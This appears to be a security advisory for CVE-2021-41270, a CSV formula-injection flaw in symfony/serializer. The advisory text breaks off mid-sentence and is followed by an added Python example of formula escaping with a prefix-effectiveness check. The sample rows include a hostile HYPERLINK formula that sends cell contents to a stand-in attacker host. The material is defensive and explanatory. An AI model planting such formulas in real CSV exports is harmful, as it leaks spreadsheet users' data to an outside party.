CVE-2021-41270 [MEDIUM] CWE-1236 CSV Injection in symfony/serializer
Affected versions: ≥ 5.0.0, < 5.3.12 and ≥ 4.1.0, < 4.4.35
Published: 2021-11-24
Description
CSV Injection, also known as Formula Injection, occurs when an application embeds untrusted input in a CSV file. When a spreadsheet program opens the CSV, any cell that starts with `=` is interpreted as a formula rather than as text, so an attacker who controls that input can have the spreadsheet evaluate a formula of their choosing on the victim's machine.
In Symfony 4.1, we've added the opt-in `csv_escape_formulas` option in `CsvEncoder`, to prefix all cells starting with `=`, `+
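The following is an added example, not Symfony's code, that re-implements the same idea in Python: a CSV encoder with an opt-in formula-escaping switch, applied to constructed sample rows. The trigger list is OWASP's list for CSV injection (`=`, `+`, `-`, `@`, Tab, CR) and the prefix is OWASP's recommended single quote; both are assumptions of this example rather than something the page above states. The `is_formula_cell` helper also shows the check a practitioner should run on any chosen prefix: a prefix that is itself a trigger character (a Tab, for instance) leaves the escaped cell just as dangerous as the original.

```python
import csv
import io

# Characters that make common spreadsheet software treat a cell as a formula
# (OWASP CSV Injection guidance; assumed here, not taken from the advisory).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# OWASP's suggested neutralising prefix: a leading single quote forces the
# cell to be read as text.
SAFE_PREFIX = "'"


def is_formula_cell(cell: str) -> bool:
    """True if a spreadsheet would interpret this cell as a formula."""
    return cell.startswith(FORMULA_TRIGGERS)


def escape_formula(cell: str, prefix: str = SAFE_PREFIX) -> str:
    """Prefix a cell that would otherwise be evaluated as a formula.

    Cells that do not start with a trigger character are returned unchanged.
    """
    return prefix + cell if is_formula_cell(cell) else cell


def encode_csv(rows, escape_formulas: bool = False, prefix: str = SAFE_PREFIX) -> str:
    """Encode rows of cells as CSV text.

    escape_formulas=False reproduces the unsafe default: untrusted input is
    written verbatim. escape_formulas=True neutralises formula cells first.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    for row in rows:
        cells = [str(c) for c in row]
        if escape_formulas:
            cells = [escape_formula(c, prefix) for c in cells]
        writer.writerow(cells)
    return buf.getvalue()


# Constructed sample export: the "note" column is attacker-controlled. The
# formula is a benign stand-in for the real thing; anything the spreadsheet
# can evaluate (links that exfiltrate cell contents, DDE, etc.) fits here.
SAMPLE_ROWS = [
    ["name", "note"],
    ["alice", "regular customer"],
    ["mallory", '=HYPERLINK("https://attacker.example/?q="&A2,"Open")'],
]


def prefix_is_effective(prefix: str) -> bool:
    """Check that escaping with this prefix actually leaves a non-formula cell.

    A Tab prefix fails this check: Tab is itself on the trigger list, so the
    escaped cell still starts with a trigger character.
    """
    return not is_formula_cell(escape_formula("=1+1", prefix))


if __name__ == "__main__":
    print("--- unsafe export (formula reaches the spreadsheet) ---")
    print(encode_csv(SAMPLE_ROWS))
    print("--- hardened export (formula neutralised) ---")
    print(encode_csv(SAMPLE_ROWS, escape_formulas=True))
    print("single-quote prefix effective:", prefix_is_effective(SAFE_PREFIX))
    print("tab prefix effective:", prefix_is_effective("\t"))
```

Note the trade-off this approach carries: any value that legitimately starts with `-` or `+` (negative numbers, phone numbers) is also prefixed, so escaping is best applied only to columns that hold free-form user input, or the consumer must strip the quote on import.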